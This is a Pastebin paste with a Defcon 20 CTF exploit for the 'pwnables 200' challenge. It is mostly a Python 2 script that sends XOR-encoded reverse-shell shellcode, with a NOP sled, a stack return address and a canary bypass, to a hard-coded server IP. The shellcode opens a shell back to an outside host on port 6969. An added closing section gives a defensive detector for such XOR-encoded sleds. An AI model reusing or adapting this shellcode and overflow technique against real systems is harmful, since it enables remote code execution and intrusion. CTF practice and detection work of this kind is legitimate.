exploit write up - pwnables 200 Defcon 20 CTF, by @_g05u_ - Pastebin.com
Untitled
a guest
Jun 3rd, 2012
```python
#!/bin/python
# exploit write up - pwnables 200 Defcon 20 CTF
# by @_g05u_ NULL Life FTW!
# (Python 2 script)
import socket, struct
#jump to shellcode in stack
ret = struct.pack("<I", 0xbfbee2ac)
#reverse shell 6969 https://www.shell-storm.org/shellcode/files/shellcode-676.php
shellcode = "\x31\xc9\x51\x41\x51\x41\x51\x51\x31\xc0\xb0\x61\xcd\x80\x89\x07\x31\xc9\x88\x4f\x04\xc6\x47\x05\x02\xc7\x47\x08\xbe\xe8\xf5\x09\x66\xc7\x47\x06\x1b\x39\x6a\x10\x8d\x47\x04\x50\x8b\x07\x50\x50\x31\xc0\xb0\x62\xcd\x80\x31\xc9\x51\x8b\x07\x50\x50\x31\xc0\xb0\x5a\xcd\x80\x41\x83\xf9\x03\x75\xef\x31\xc9\x51\x51\x31\xc0\xb0\x17\xcd\x80\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41"
shellcode = "\x90" * (512 - len(shellcode) - 100) + shellcode + "\x90" * 100
shellcode = map(lambda x:(ord(x) ^ 0x42), shellcode)
shell_encoded = ''
for s in shellcode:
    shell_encoded += chr(s)
ret = map(lambda x:(ord(x) ^ 0x42), ret)
ret_encoded = ''
for s in ret:
    ret_encoded += chr(s)
s = socket.socket()
s.connect(("140.197.217.155", 8912))
s.send("b74b9d86e6cd3480\n")
print s.recv(1024)
s.send("4200A642\n") #decoded shellcode with xor 0x42
print s.recv(1024)
#bypass canary number in binary
s.send(shell_encoded + "\x4D" + ret_encoded)
```
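From a detection standpoint, the payload above has a recognizable shape: NOP padding out to 512 bytes, then a single-byte XOR (0x42) over the whole buffer, which leaves long runs of one repeated byte on the wire. The following added example (Python 3, not part of the original paste) flags such runs in a captured payload and derives the candidate XOR key; the function names, the 32-byte threshold and the inert constructed sample are assumptions made here.

```python
# Added defensive example, not code from the original paste.
NOP = 0x90  # x86 single-byte NOP, used as sled padding in the paste


def byte_runs(data, min_run):
    """Yield (offset, length, value) for each run of one repeated byte."""
    start = 0
    for i in range(1, len(data) + 1):
        if i == len(data) or data[i] != data[start]:
            if i - start >= min_run:
                yield start, i - start, data[start]
            start = i


def find_xor_sleds(payload, min_run=32):
    """Report long same-byte runs and the XOR key that maps them to NOPs.

    xor_key == 0 means an unencoded NOP sled; any other value is the
    single-byte key under which the run decodes to 0x90.
    """
    return [
        {"offset": off, "length": length, "byte": value, "xor_key": value ^ NOP}
        for off, length, value in byte_runs(payload, min_run)
    ]


def build_sample(key=0x42, total=512, tail=100):
    """Constructed sample with the paste's layout; the filler is inert."""
    filler = bytes(range(1, 120))  # placeholder bytes, not shellcode
    lead = total - len(filler) - tail
    plain = bytes([NOP]) * lead + filler + bytes([NOP]) * tail
    return bytes(b ^ key for b in plain)


if __name__ == "__main__":
    for finding in find_xor_sleds(build_sample()):
        print(finding)
```

A finding is a triage signal rather than a verdict: benign zero padding also forms long runs and would be reported with `xor_key` 0x90, so pair it with context such as the destination service and payload size.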